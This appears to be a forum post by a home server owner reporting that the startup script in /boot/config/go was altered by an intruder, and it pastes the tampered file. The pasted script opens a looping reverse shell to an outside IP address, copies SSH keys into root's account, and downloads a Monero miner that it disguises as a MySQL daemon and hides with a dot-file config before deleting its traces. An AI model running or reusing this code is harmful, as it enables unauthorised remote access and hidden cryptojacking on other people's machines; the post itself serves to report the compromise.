Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below:
#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{
"autosave": true,
"background": true,
"cpu": {
"enabled": true,
"max-threads-hint": 50
},
"max-cpu-usage": 25,
"cpu-priority": 1,
"opencl": false,
"cuda": false,
"pools": [
{
"url": "pool.minexmr.com:443",
"user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
"keepalive": true,
"tls": true
}
]
}' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz
Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..